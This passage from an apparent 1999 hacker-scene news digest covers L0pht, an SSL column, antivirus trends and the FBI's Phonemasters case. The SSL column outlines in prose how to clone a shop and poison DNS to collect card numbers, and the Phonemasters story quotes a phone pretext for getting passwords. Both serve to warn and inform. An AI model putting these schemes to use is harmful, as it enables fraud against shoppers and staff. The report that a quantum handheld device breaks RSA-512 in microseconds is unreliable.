disclosure. "It's uncool," he says, for utility companies to "learn about a
problem by reading it in the newspaper." That's why he plans to alert
companies in advance, so they can close vulnerabilities before the news is
made public on L0pht's Web site.
Like Nader, the L0pht members can get a bit preachy on the subject
of ethics. "Any of us could leave L0pht right now and take
six-figure jobs," Mudge says. "The fact that we don't and we're on the
ramen-noodle, mac-and-cheese diet, that speaks for our ethics right
there. It's not a job for us; this is what drives us through life."
While Mudge's self-righteousness may be
justified up to a point, there are also more
prosaic reasons for working at L0pht.
Freedom to do whatever you want, for
instance. Silicosis and Brian Oblivion are
installing a motor-driven satellite dish on the
warehouse roof. They hope to capture
ground-to-space communications from the
Space Shuttle and high-resolution images of
the earth broadcast from satellites. The
justification? It's cool. Silicosis adds, "It
impresses my girlfriend."
Space Rogue a sort of young Archie
Bunker figure, to the extent that an Archie
Bunker figure can be young sticks closer to
earth when asked how he ended up at L0pht.
"I did one semester in college, said the hell with this and got out.
Controlled learning environments have never been my strong point."
L0pht gave him a place to pursue projects at his own pace.
Mostly, Space Rogue seems to like L0pht for the camaraderie. "I moved
to Boston in 1990," he says, "and I almost immediately met all these
people on line on local bulletin boards. L0pht started shortly thereafter in
fall '91. So I'd already known these people awhile, even face to face.
The on-line world at the time was very small."
Mudge recalls that the group took off when members moved their
computers from their living rooms to a small loft space in Boston. (All but
one of the founders, Brian Oblivion, have since left.) L0pht soon added
members and moved to a larger suburban warehouse four years ago. It
has also started a consulting business on the side called L0pht Heavy
Industries.
L0pht is not without critics, of course. "While L0pht puts on the
Robin Hood mantle of fighting the big computer companies," a
senior programmer at Microsoft tells me, "their only victims are the little
people that are customers" the people who purchase products like
Windows 2000.
Microsoft has been on the business end of several L0pht advisories, most
notably when Mudge and Weld demonstrated how to decrypt
passwords from computers running Microsoft's NT operating system.
Jason Garms, the former head of Microsoft's security-response team,
admits that hackers have a role in creating secure software. But he's wary
of the Darwinian notion that hackers will, by actively looking for flaws,
expose inferior products. He likens it to improving public safety by
painting a target on everyone's head.
I mentioned Garms's criticism to the L0pht members, who were equally
dismissive. If gray-hat hackers stopped searching for vulnerabilities,
L0pht believes, a black-hat hacker would find them sooner or later. It's
better to get rid of flaws than hope no one finds them. The N.S.C.'s
Hunker shares this belief the hackers are already out there" which
is why he applauds L0pht for keeping vendors honest.
The senior Microsoft programmer also warns that Mudge and his
colleagues, for all their highfalutin apologia, are motivated mostly by
naked ego: "I am certain," he says, "that the primary motivation of these
people is simple self-gratification and justification."
I asked the L0pht members whether ego played a part in their ethical
reasoning. Weld Pond replied that, by assuming pseudonyms, they more
or less deny themselves the benefits of celebrity. "When I walk down the
street," he says, "no one knows I'm Weld Pond."
But at Defcon, the annual hacker convention, it was quite clear that
everyone knew Weld, Mudge, Space Rogue and Dildog. L0pht
members have become, as Mudge notes wryly, "rock stars of the
computer underground." That they help malicious hackers as well as the
Feds and big business hasn't hurt their popularity among the outlaws.
On the other hand, L0pht's poorly hidden hunger for the spotlight
shouldn't obscure the truly fascinating work they've done. Socially
important research is perfectly compatible with, and perhaps inseparable
from, love of celebrity, as James Watson has made admirably clear. Say
what you will, there is no denying that L0pht's advisories have improved
computer security even as they have harmed corporations and
government agencies.
No one doubts that information security is going to become an
increasingly critical topic as the ordinary economy moves into the digital
age. In their grander moments, L0pht's members hope to become digital
Ralph Naders, making sure that the software behind the transition is as
safe as manufacturers say.
The idea of eight computer hackers in a dingy warehouse insuring the
safety of the information age may sound a little farfetched. But sometimes
hackers eventually direct their curiosity toward laudable ends. Take, for
example, the two young hackers who engineered a small blue box in the
early 1970's that allowed free long-distance calls when placed near a
telephone receiver. The two enterprising techies went door to door in the
Berkeley dorms, selling the devices. Their names? Steve Jobs and Steve
Wozniak, future founders of Apple Computer.
Bruce Gottlieb was a staff writer at Slate magazine until enrolling in Harvard
Law School this fall.
@HWA
45.0 NO SAFETY IN NUMBERS
~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 12:05 am CET
After an Israeli research institute said it could break Europe's banking codes in less
than a second, a initiative has been launched that could result in unbreakable codes.
The European Institute of Quantum Computing Network was founded a few weeks
after news leaked from the Israel's Weizmann Institute that it was using a mixture of
quantum computing and special optical technology to break the RSA-512 code, the
system used by the European banking system. It claims it has developed a
hand-held device that can break the code in 12 microseconds. The Sunday Times
http://www.sunday-times.co.uk/news/pages/tim/99/09/29/timintint02001.html?1341861
Europe's banking codes have been cracked in the blink of
an eye
©
End of the Enigma: Quantum Computing will spell the end of conventional
encryption, such as the codes broken at Bletchley Park
No safety in numbers
BEN HAMMERSLEY
ben.hammersley@the-times.co.uk
After an Israeli research institute said it could break
Europe's banking codes in less than a second, a initiative
has been launched that could result in unbreakable codes.
The European Institute of Quantum Computing Network
was launched on Monday, to bring companies and
research labs throughout Europe together in the hope that
the new technology - Quantum Computing - can be taken
from the theory to the high street.
The institute was founded a few weeks after news leaked
from the Israel's Weizmann Institute that it was using a
mixture of quantum computing and special optical
technology to break the RSA-512 code, the system used
by the European banking system. It claims it has
developed a hand-held device that can break the code in
12 microseconds.
Quantum computing works by taking advantage of the
peculiar characteristics of subatomic particles. Whereas a
normal computer relies on a signal - or bit - being either
on or off, a quantum bit can be both on and off at the
same time. This unusual ability means a great deal more
information can be stored. While a regular computer
works through each sum one at a time, a quantum
computer can do every operation at the same time.
This, the EIQC says, offers, "not just incremental
improvements, but a fundamental breakthrough" in
computing power - enough for code-breaking,
voice-recognition and translating computers to be simple
to build.
The second aspect of Quantum computing, however, will
help to make information more secure. Using a feature
called "quantum entanglement", information could be sent
between two computers that could not be eavesdropped
upon without the two computers' knowledge. Because
quantum physics dictates that monitoring a subatomic
particle changes its state; not only would an eavesdropper
announce his presence, but the message would be
garbled.
"A hacker wouldn't know where to start," says Jonathan
Curtis of Quantum Electronic Devices.
As one member of EIQC, who wished to remain
anonymous, predicts: "While quantum computers may be
some time off, when they are available no communication
will be secure unless it is quantum."
@HWA
46.0 YAHOO! MESSENGER DoS
~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Sunday 3rd October 1999 on 5:01 pm CET
A denial of service attack exists in build 733 of Yahoo! Messenger. The vulnerability
exists when Messenger leaves port 5010 open. When a connection is made on port
5010, Messenger crashes. The connection stays open until the user closes the
program. Team Asylum Security found that hole and informed Yahoo! of it. They have
released build 734. Yahoo! Messenger (Build 734) still has port 5010 open but will not
crash if connections are made unto it.
http://www.team-asylum.com
@HWA
47.0 PROBLEM IN MCF40.DLL
~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Sunday 3rd October 1999 on 4:35 pm CET
Microsoft informs us of a problem in MfC40.dll. An internal function within Mfc40.dll is
designed to add 1900 to every 2-digit date that is passed to it. For example, 99 is
returned as 1999. If more than 2 digits are passed, nothing is added. Programs that
use this function may incorrectly parse a date after the year 2000. Solutions here.
http://support.microsoft.com/support/kb/articles/Q152/7/34.ASP
@HWA
48.0 US AIMS TO FIGHT ATTACKS ON FINANCIAL SYSTEMS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:45 pm CET
The U.S. Treasury Department on Friday opened a center intended to help the
financial services industry and the government share information about cyber attacks
and threats. The Financial Services Information Sharing and Analysis Center was
formed following a directive from President Clinton that the Treasury Department work
with the banking and finance sectors to find ways to improve security of information
systems, according to a written statement issued Friday from the department. Read
more
http://www.infoworld.com/cgi-bin/displayStory.pl?99101.entreasury.htm
U.S. aims to fight attacks on financial systems
By Nancy Weil
InfoWorld Electric
Posted at 12:00 PM PT, Oct 1, 1999
The U.S. Treasury Department on Friday opened a center intended to help the financial services industry and the government share information about cyber
attacks and threats.
The Financial Services Information Sharing and Analysis Center was formed following a directive from President Clinton that the Treasury Department work
with the banking and finance sectors to find ways to improve security of information systems, according to a written statement issued Friday from the
department.
The center was officially announced by U.S. Treasury Secretary Lawrence Summers and is being supported by the U.S. Securities and Exchange
Commission and the Federal Reserve Board. A dozen financial services companies have said they are interested in participating in the center, according to
the statement.
"When I first joined the Treasury some years ago, I can assure you we were not thinking about threats to the financial system emanating from viruses, Trojan
horses, logic bombs, or malicious code," Summers said in a prepared statement delivered when he announced the center Friday morning. "But we are
thinking about those things now, and with good reason."
The pervasive use of the Internet by individuals and financial institutions has led to new needs when it comes to security, he said. A study last year by the
Computer Security Institute found that among companies polled, 64 percent had information system security breaches, up 16 percent over 1997, he added.
The total financial loss from the breaches rose 36 percent in a year.
"As damaging as these attacks have been, the vast majority has been conducted by disgruntled individuals," Summers said in his written remarks. "We face a
future, though, where criminals, terrorists or even nation-states may use the same tools in a more organized way for darker purposes."
The new center, Summers said, "can play a key role in bolstering the confidence of the American public in the security and stability of our financial system" by
enabling the financial industry and the government to share details about cyber attacks and how to quell them.
Additional information about the center had not been posted on the Treasury Department Web site as of Friday afternoon. The department, in Washington,
can be reached at www.ustreas.gov.
Nancy Weil is a correspondent in the Boston bureau of the IDG News Service, an InfoWorld affiliate.
@HWA
49.0 DIGITALBOND ON SSL
~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:35 pm CET
SecuritPortal did an interview with Dale Peterson of DigitalBond, the company which
last week went public with some of the major problems in SSL, showing that this isn't
that secure either. The article also describes the actual workings of their attack on
the Secure Sockets Layer system. Read it here.
http://securityportal.com/direct.cgi?/closet/closet19990930.html
Special Kurt's Closet: Is SSL dead?
Kurt Seifried, seifried@seifried.org, for http://www.securityportal.com/
September 30, 1999 - The title is a bit scary, but I wanted to get your
attention (worked, didn't it?). Most security experts have been aware of problems
with SSL, but generally speaking we haven't said much because there wasn't
much of a replacement available for it, and it hasn't been exploited extensively
(chances are it will be, though). I'll start with an explanation of the basic
attack, followed by some methods to protect yourself, and finish with an
interview with Dale Peterson of DigitalBond and the summary.
How to do it
Let's say I want to scam people's credit card numbers, and don't want to break into a server. What if I could get
people to come to me, and voluntarily give me their credit card numbers? Well, this is entirely too easy.
I would start by setting up a web server, and copying a popular site to it, say www.some-online-store.com, time
required to do this with a tool such as wget is around 20-30 minutes. I would then modify the forms used to submit
information and make sure they pointed to my server, so I now have a copy of www.some-online-store.com that looks
and feels like the "real" thing. Now, how do I get people to come to it? Well I simply poison their DNS caches with my
information, so instead of www.some-online-store.com pointing to 1.2.3.4, I would point it to my server at 5.6.7.8.
Now when people go to www.some-online-store.com they end up at my site, which looks just like the real one.
How to prevent being taken
Most forms online are not on secure servers, but the data you provide is usually sent to a secure server, which leads
to one of the major problems. The form data may not be going where it should. A simple attack is to have the fake
site, and a form that takes the data, without using a secure server at all. How many of you actively check the source
HTML of pages you are plugging your credit card data into? The title bar should start with https:// followed by the
sitename (i.e.: https://www.microsoft.com/). You should also examine the HTML source to make sure the form data
points to where it should go, you should see something like:
<form method="POST" action="/order.cgi">
or:
<form method="POST" action="https://www.some-online-store.com/cgi-bin/order.cgi">
If a store is using the "GET" method, do not buy from them, any data you enter will be passed along as the query
string, if you look in the text of your address bar you will see your credit card info. If a store specifies a relative link
(i.e.: /something/something.cgi) then make sure the current site you are at is a secure server, and that the certificate
is legitimate. If the link is absolute, and points to an IP address, be suspicious, I personally would not buy if this were
the case. Ideally the link should point to something like "https://www.some-online-store.com/cgi-bin/order.cgi", and
you should first browse to that site, and make sure the certificate is legitimate, before hitting the submit button on
your order form. Most current SSL attacks are based on fooling the user, more so than breaking the technology. If you
are vigilant, and check certificates before you submit to sites you will be a little safer (but not completely).
SSL Certificates contain various pieces of information, such as who issued them, when it was issued, when it expires,
who it was issued to and so forth. Who it was issued to (usually the "subject") is a very important field, and the issuer
field. To view the certificate details double click on the lock icon, usually at the bottom left of the screen in Netscape,
and at the bottom right in Microsoft Internet Explorer. Let's take https://www.microsoft.com/ for example, the Issuer
field looks like:
OU = Secure Server Certification Authority
O = RSA Data Security, Inc.
C = US
The C stands for country, the O for organization (usually the company's name), and the OU stands for organizational
unit (a division of the company). The subject field looks like:
CN = www.microsoft.com
OU = mscom
O = Microsoft
L = Redmond
S = Washington
C = US
The S stands for state, the L for locality (the city), and the CN is the certificate name (the site it applies to). Make
sure all these are spelt correctly, many attackers will use domain names that look familiar (such as miicrosoft.com) in
order to get legitimate certificates. Taking these precautions every time you use an SSL secured service is tedious,
and underlines one of the major flaws with SSL, in that is susceptible to "social engineering" attacks. Another flaw in
SSL is that it only secures the session, it doesn't secure any actually transaction. This means if someone does steal
your credit card number and use it online, it is almost impossible to prove that it wasn't actually you that issued the
order. SSL does allow for the client to authenticate to the server, however very few people have digital certificates
compatible with this (I have one, and know of perhaps a half dozen other people, a definite minority). In addition to
this the major certificate vendors have stopped issuing the personal certificates that guarantee the person's identity,
so they are a dead end. There are newer protocols and systems that allow for two parties to safely conduct
transactions with all these features.
The following is an interview with Dale Peterson of DigitalBond (www.digitalbond.com). DigitalBond is currently working
on a product to secure Internet transactions, and is targeted at brokerage houses which have many thousands of
users on a daily basis, making them an especially tempting target.
Kurt: Is SSL dead?
Dale: No. It is a fine session encryption protocol. The editor for the TLS
(new name for latest version of SSL) spec works at Certicom and is our
partner. I've talked this over with him, and he is very insistent
that SSL is not broken. But he does say it suffers from all the
problems we have discussed in these emails and could be augmented with
a transaction protocol.
I think that it certainly shouldn't be the protocol for most
e-commerce transactions, but for the exchange of private data over the
Internet it is ok.
Kurt: What do you envision replacing SSL?
Dale: We see a lot of businesses that are doing two-party transactions.
Nice and simple, unlike the multi-party bank card model that SET
addresses. We have developed a two-party transaction security model
that we thinks meets the needs of Internet Brokerages, Internet
prescription drugs, and other two-party transactions. It is being
reviewed by Carnegie Mellon University, and they will publish a paper
this year.
Kurt: Should we be educating users about these technologies? Do they care?
Dale: The most important education needed is that SSL transactions are not
secure. The whole Internet community has been fed this baloney
because SSL was around and easy. I have found it difficult getting
reporters to even believe this vulnerability exists, even with a live
demo. The response is "That can't be true. We would all know about
this if that were true". That is why I think this story will be big
when it breaks in the mainstream press.
Summary:
SSL is NOT dead. It is just an inappropriate security system for many Internet based transaction systems. As with
many things on the Internet the growth of online sales, and especially the growth of online brokerages has been
stupendous. SSL was simply not designed with systems like these in mind, and systems like DigitalBond are attempting
to fix this. Chances are in 5 to 10 years that the existing systems will be found to be "weak", and replaced with better
systems.
Kurt Seifried is a security analyst and the author of the "Linux Administrators Security Guide", a source of natural
fiber and Linux security, part of a complete breakfast.
Related links:
http://www.digitalbond.com/
http://developer.netscape.com/tech/security/ssl/howitworks.html
http://developer.netscape.com/docs/manuals/security/sslin/index.htm
@HWA
50.0 THE FUTURE OF AV COMPANIES
~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 3:10 pm CET
Soon, every user will get free virus detection software over the Internet. So what does
this future hold for anti-virus companies? "In the future it won't be about protecting
computers against viruses, but content security", says security firm ICCA. But it's all
about the updates, according to Symantec. Full story
http://www.zdnet.com/zdnn/stories/news/0,4586,2346360,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Virus protectors get a brand new bag
By Robert Lemos, ZDNN
October 1, 1999 4:18 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2346360,00.html
VANCOUVER, Canada -- Anti-virus software is quickly going the way of the browser -- soon
to be free and ubiquitous, said industry insiders Friday at the Virus Bulletin99 conference.
Soon, every user will get free detection software, with security firms selling updates via the Internet
at a monthly fee. Anti-virus services will also be sold to Internet Service Providers for resale to
users.
"In the future it won't be about protecting computers against viruses, but content security," said
Larry Bridwell, program technology manager for security firm International Computer Security
Association.
With the number of threats against computers increasing -- viruses, hackers, privacy-invading
companies, and good old-fashioned bugs, to name a few -- keeping content safe and the
computer running is now Job No.1.
Consumers' desire for a single fix-it package is changing the economics of the industry, admitted
Carey Nachenberg, chief scientist for the Symantec Anti-virus Research Center.
"We're all afraid the retail channel will dry up," he said.
Viruses with sneakers
An even more important factor: Viruses infecting computers via e-mail move far too quickly for
companies to rely on manual updates to their software.
Last spring, for example, the Melissa virus infected hundreds of thousands of computers within 48
hours. "We're at a turning point right now," said Nachenberg in a keynote speech Thursday. "We
need to re-examine our anti-virus software, and companies need to re-examine their anti-virus
strategies."
Symantec (Nasdaq:SYMC) is taking a two-pronged approach to the problem. With partner IBM
Corp. (NYSE:IBM), the anti-virus software maker is nearing completion of its "Digital Immune
System." The technology automatically updates all subscribers over the Internet with virus
recognition patterns whenever one of those computers encounters a new virus.
Fixes for a new virus can be disseminated to all the machines on the network within as little as 30
minutes of encountering the first virus. The speed of the Internet, which viruses use to spread
quickly, can now be used to get the cure out just as fast.
"As we distribute information faster and more broadly, we have to be careful," said Steve White,
senior manager of IBM's Massively Distributed Systems Research Division, who helped design
the new Digital Immune System service. "It becomes much easier to get viruses over the Internet."
Firewall for the home
Symantec is also preparing to package its anti-virus software into a single integrated security suite
that will give home users a firewall, Internet filtering software and anti-virus utilities, said Symantec
engineers at the show. The product will be released later this month.
But even that stand-alone product will eventually be connected to the Digital Immune System
service, providing virus updates extremely quickly.
"The whole industry is going toward automatic fixes and automatic updates," said IBM's White.
"The anti-virus vendors are just adopting it faster."
Symantec's rivals are working on similar strategies. "A lot of the basis of value of a stand-alone
product in the home is going away," said Crag Kensek, director of product marketing for
anti-virus firm Trend Micro Inc. "For the non-technical home user, it's like insurance."
Trend announced in September its new eDoctor strategy, which allows ISPs to protect their
customers from viruses by scanning each file downloaded from the Internet. U S West
(NYSE:USW) and Sprint Communications Corp. (NYSE:FON) have signed on to the service.
Virus reporting valuable
Rival security software firm Network Associates Inc. (Nasdaq:NETA) plans to release a similar
technology to Symantec's called the AutoImmune System, early next year, its engineers said.
While finding and fixing viruses faster has captured the interest of corporate network
administrators, an automated system's ability to collect data on the number of virus incidents is
equally valuable, said one administrator at the conference, who asked to remain anonymous.
Currently, the best source of such data is the Wildlist, and even that volunteer site would like to
see better and more accurate statistics, said Sarah Gordon, one of the directors of the
independently maintained Wildlist.
"It would be extremely useful to get reports from these systems," she said. "We intend to pursue
that in the future."
@HWA
51.0 UNPLUGGING THE "PHONEMASTERS"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Saturday 2nd October 1999 on 2:55 pm CET
ZDNet has a story on the "ring of hackers" calling themselves the Phonemasters,
who gained access to the telephone networks of companies as AT&T, British
Telecom, MCI Worldcom etc and on how they were tracked and busted by FBI
agents.
http://www.zdnet.com/zdnn/stories/news/0,4586,2345639,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Unplugged! The biggest hack in history
By John Simons, WSJ Interactive Edition
October 1, 1999 8:54 AM PT
URL: http://www.newslinx.com/
DALLAS -- In a federal courtroom here, Calvin Cantrell stands silently, broad shoulders
slouched. His lawyer reads from a short letter he has written:
"My parents taught me good ethics, but I have departed from some of these, lost my way
sometimes," the letter states. "I was 25 and living at home. No job, and no future... . All I ever
really wanted was to work with computers."
Cantrell certainly did work with computers -- both his own, and, surreptitiously, those of some of
the largest companies in the world. He was part of a ring of hackers that pleaded guilty here to the
most extensive illegal breach of the nation's telecommunications infrastructure in high-tech history.
And sitting behind him in court as he was sentenced two weeks ago was the
accountant-turned-detective who caught him: Michael Morris. A decade earlier, Morris, bored
with accounting work, left a $96,000 job at Price Waterhouse and enrolled in the FBI academy,
at $24,500 a year. Cantrell's sentencing was the final act in a five-year drama for Morris, and
secured his reputation as the FBI's leading computer gumshoe.
The tale of Morris and Cantrell is among the first cops-and-robber stories of the New Economy,
involving, among other things, the first-ever use of an FBI "data tap." It illustrates how the nation's
law-enforcement agencies are scrambling to reinvent their profession in a frantic effort to keep
pace with brilliant and restless young hackers.
Unlimited potential for harm
The story also shows that hacking's potential harm is far more ominous than theft of telephone
credit-card numbers. Cantrell was part of an eleven-member group dubbed "The Phonemasters"
by the FBI. They were all technically adept twentysomethings expert at manipulating computers
that route telephone calls.
The hackers had gained access to telephone networks of companies including AT&T Corp.,
British Telecommunications Inc., GTE Corp., MCI WorldCom (then MCI Communications
Corp.), Southwestern Bell, and Sprint Corp. They broke into credit-reporting databases
belonging to Equifax Inc. and TRW Inc. They entered Nexis/Lexis databases and systems of Dun
& Bradstreet, court records show.
The breadth of their monkey-wrenching was staggering; at various times, they could eavesdrop on
phone calls, compromise secure databases, and redirect communications at will. They had access
to portions of the national power grid, air-traffic-control systems and had hacked their way into a
digital cache of unpublished telephone numbers at the White House. The FBI alleges, in evidence
filed in U.S. District Court for the Northern District of Texas, that the Phonemasters had even
conspired to break into the FBI's own National Crime Information Center.
Unlike less-polished hackers, they often worked in stealth, and avoided bragging about their
exploits. Their ultimate goal was not just fun, but profit. Some of the young men, says the FBI,
were in the business of selling the credit reports, criminal records, and other data they pilfered
from databases. Their customers included private investigators, so-called information brokers and
-- by way of middlemen -- the Sicilian Mafia. According to FBI estimates, the gang accounted for
about $1.85 million in business losses.
"They could have -- temporarily at least -- crippled the national phone network. What scares me
the most is that these guys, if they had had a handler, whether criminal or state-sponsored, could
have done a lot of damage," says Morris. "They must have felt like cyber gods."
Some may be still at large
With the exception of Cantrell, none of the defendants in the Phonemasters case would comment
on the matter. Others are thought to remain at large. This is the story of Cantrell and two
accomplices largely put together from federal district court records and FBI interviews. Morris
first learned of the group in August 1994, when he got a phone call from a Dallas private
investigator, saying Cantrell had offered to sell him personal data on anyone he wished. He even
offered a price list: Personal credit reports were $75; state motor-vehicle records, $25; records
from the FBI's Crime Information Center, $100. On the menu for $500: the address or phone
number of any "celebrity/important person."
Morris immediately opened an investigation. Only 33-years-old at the time, he had taken an
annual pay cut to join the FBI just five years earlier. He had been a tax consultant at Price
Waterhouse, and despised the work. "I was young and making the big bucks, but every morning I
would think 'God, I don't want to go to work.' "
Tall, square-jawed and mustachioed, Morris began working on white-collar crimes when he
arrived at the Dallas FBI field office. He took on a few hacker cases and realized he liked the
challenge. "These guys are not the kind who'll rob the convenience store then stare right into the
security camera," he says. "Trying to be the Sherlock Holmes of the Internet is hard when the
fingerprints on the window can be so easily erased."
Morris convinced the private investigator to meet with Cantrell while wearing an audio taping
device. After reviewing the tapes, he was certain that he was onto something big. He applied for
and received court authority to place a digital number recorder on Cantrell's phone lines, which
would log numbers of all outgoing calls. It showed that Cantrell frequently dialed corporate
telephone numbers for AT&T, GTE, MCI, Southwestern Bell and Sprint. Cantrell had also placed
calls to two unlisted numbers at the White House, which further piqued Morris's interest.
So, late that summer, Morris took an unprecedented step. He began writing a 40-page letter to
the FBI's Washington headquarters, the Department of Justice and the federal district court in
Dallas. Recording Cantrell -- now his central suspect -- while on the phone wasn't sufficient for
the job that faced him, he believed. Instead, he needed new federal powers. He asked for
Washington's permission to intercept the impulses that traveled along Cantrell's phone line as he
was using his computer and modem.
"It's one of the hardest techniques to get approved, partly because it's so intrusive," says Morris,
who spent the next month or so consulting with federal authorities. "The public citizen in me
appreciates that," he says. Still, the long wait was frustrating. "It took a lot of educating federal
attorneys," he says.
Once authorities said yes, Morris faced another obstacle: The equipment he needed didn't exist
within the FBI. Federal investigators had experimented with a so-called data-intercept device only
once before in a New York hacker case a year earlier. It had failed miserably.
Morris and technicians at the FBI's engineering lab in Quantico, Va., worked together to draft the
specifications for the device Morris wanted. It would need to do the reverse of what a computer's
modem does. A modem takes digital data from a computer and translates it to analog signals that
can be sent via phone lines. Morris's device would intercept the analog signals on Cantrell's phone
line and convert those impulses back to digital signals so the FBI's computers could capture and
record each of a suspect's keystrokes.
Alerting the victims
While waiting for the FBI to fit him with the proper gear, Morris contacted several of the
telephone companies to alert them that they had been victimized. The reception he got wasn't
always warm. "It's kind of sad. Some of the companies, when you told them they'd had an
intrusion, would actually argue with you," he said.
GTE was an exception. Morris discovered that Bill Oswald, a GTE corporate investigator, had
opened his own Phonemasters probe. Oswald and Morris began working together and uncovered
another of Cantrell's schemes: He and some friends had managed to get their hands on some
telephone numbers for FBI field offices. They entered the telephone system and forwarded some
of those FBI telephones to phone-sex chat lines in Germany, Moldavia and Hong Kong. As a
result of the prank, the FBI was billed for about $200,000 in illegal calls.
Morris also learned that on Oct. 11, 1994, Cantrell hacked GTE's computer telephone "switch" in
Monticeto, Calif., created a fake telephone number and forwarded calls for that number to a
sex-chat line in Germany. The FBI isn't sure how Cantrell convinced people to call the number,
but court records show that Cantrell received a payment of $2,200 from someone in Germany in
exchange for generating call traffic to the phone-sex service.
In early December 1994, Morris's "analog data-intercept device" finally arrived from the FBI's
engineering department. It was a $70,000 prototype that Morris calls "the magic box."
On Dec. 20, Morris and other agents opened up their surveillance in an unheated warehouse with
a leaky roof. The location was ideal because it sat between Cantrell's home and the nearest
telephone central office. Morris and nine other agents took turns overseeing the wiretap and data
intercepts. The agents often had to pull a tarp over their workspace to keep rain from damaging
the costly equipment.As middle-class families go, the Cantrells seem exemplary. Calvin's father,
Roy, was a retired detective who had once been voted "Policeman of the Year" in Grand Prairie,
the suburb west of Dallas where they live. His mother, Carol, taught Latin and English at Grand
Prairie High School, where Calvin graduated in 1987 with above-average grades.
As a student, he was no recluse. He had a small circle of friends who shared
his love of martial arts, video games and spy movies. Cantrell's longtime
friend, Brandon McWhorter, says Calvin was always a fun-loving guy, but
there was one thing about which he was very serious.
"He would always talk to me about religion," McWhorter says. "He held very
strong religious beliefs."
After high school, Cantrell continued to live at home while taking classes at the University of Texas
at Arlington and a local community college.
He held a series of odd jobs and hired himself out as a deejay for weddings and corporate parties.
Cantrell balanced, school, work, family and friends even as he began hacking more often. His
parents became suspicious, but said nothing. The family had three phones; Calvin stayed on his 15
hours a day.
"They'd go in my room and see all the notes and the phone numbers. Even though they couldn't
put it together technically, they knew something was up," says Cantrell. "They were kind of in
denial... . My parents were pretty soft."
Mrs. Cantrell says Calvin had been so well-behaved that she never suspected his computer
activities were more than fun and games. "I wish I had known what was going on. Unfortunately,
my son was smarter than I was." (Calvin's father passed away last year.)
The hack
At 8:45 on the night of Dec. 21, just four days before Christmas, Cantrell went online. Using an
ill-gotten password, he entered a Sprint computer, where he raided a database, copying more
than 850 calling-card access codes and other files, court records in the case show.
The Phonemasters often got passwords and other key information on companies in a low-tech
approach called "Dumpster diving," raiding the trash bins of area phone firms for old technical
manuals, phone directories and other company papers. This often allowed Cantrell to run one of
his favorite ruses -- passing himself off as a company insider.
"I'd call up and say, 'Hi, I'm Bill Edwards with systems administration.' ... I'd chat with them for a
while, then I'd say 'We're doing some network checkups today. Can you log off of your
computer, then tell me every character you're typing as you log back on?' A lot of people fell for
that," Cantrell says.
After hacking into the Sprint database that evening, Cantrell talked to another
hacker, Corey Lindsley, over the phone. He'd "met" Lindsley, and another
hacker, John Bosanac, in 1993 while surfing the murky world of hacker
bulletin boards. Cantrell then sent the copied files to Lindsley, who was a
student at the University of Pennsylvania in Philadelphia.
Morris's equipment captured everything -- voice and data. It was an FBI
first. "We're sitting in this place that looked liked a bomb pit, but the
atmosphere was really exciting," says Morris. "We were ecstatic."
As the days passed, the FBI wiretap generated stacks upon stacks of
audiotapes and data transcripts. Some was just idle talk among friends, the
occasional call to finalize dinner plans, lots of workaday chatter. But the
incriminating evidence mounted. "It's great, you know. I really love fraud,"
joked Bosanac, a Californian who was musing with Cantrell about the various technical methods
of using other people's cellular telephone accounts to place free calls. "Fraud is a beautiful thing."
Family conversations even entered the investigation. On Jan. 7, for instance, Cantrell called his
mother from a friend's house and asked her find an MCI manual on his shelf. He then asked her to
read him a set of directions for accessing MCI's V-NET computer system. Mrs. Cantrell read the
material but asked her son whether he was supposed to have the book, citing warnings that stated
its contents were restricted to MCI employees. Cantrell just avoided his mother's question. The
FBI data-tap captured every word.
Taking a toll
Still, the process took its toll on the FBI team, especially coming during the holidays. "It was
stressful that the wiretap was going 24 hours a day, seven days a week. I had to write up the legal
documents, and it's tough making people work through Christmas," Morris said. On top of that, he
had to keep records of his findings, and every 10 days he had to reapply to the court to prove that
his wiretap was yielding evidence.
By late
January, the FBI had begun to get a clear profile of Cantrell and his hacker friends.
Lindsley, it appeared, was the group's acerbic leader, directing much of the hacking activity. Over
phone lines, the FBI heard him bragging about how he had given a Pennsylvania police department
"the pager treatment" in retaliation for a speeding ticket he received. Lindsley had caused the
police department's telephone number to appear on thousands of pagers across the country. The
resulting flood of incoming calls, Lindsley bragged, would surely crash the department's phone
system.
They also enjoyed collecting information about film stars, musicians and other famous people.
Cantrell has admitted that he broke into President Clinton's mother's telephone billing records in
Arkansas to obtain a list of unpublished White House numbers. The men, says the FBI, even
made harassing phone calls to rock star Courtney Love and former child actor Danny Bonaduce
using pilfered numbers.
They weren't without fear of getting caught. On the evening of Jan. 17, for instance, there was a
clicking on the phone line as Bosanac, Cantrell, and Lindsley shared a three-way conference call.
"What the hell happened?" asked Bosanac, according to an FBI transcript of the conversation.
"That was the FBI tapping in," laughed Cantrell.
"Do you know how ironic that's gonna be when they play those tapes in court?" Lindsley said.
"When they play that tape in court and they got you saying it was the FBI tapping in?"On Jan. 18,
the FBI overheard Cantrell, Bosanac and Lindsley on another conference call. With the other two
men giving directions, Cantrell dialed his computer into Southwestern Bell's network and copied a
database of unlisted phone numbers. The three men then discussed plans to write a computer
program that could automatically download access codes and calling-card numbers from various
telephone systems. They also talked about the chance that the FBI would one day track them
down.
"Just remember, nobody f-- rats anybody out," said Lindsley to the others. "No deals."
"Yeah, no deals is right," replied Bosanac.
"No deals. I'm serious. I don't care what your f-- lawyers tell you," said Lindsley.
Cantrell said nothing.
Transferred codes to Canada
Later that morning, between 5:09 and 7:36, Cantrell entered Sprint's computer system and
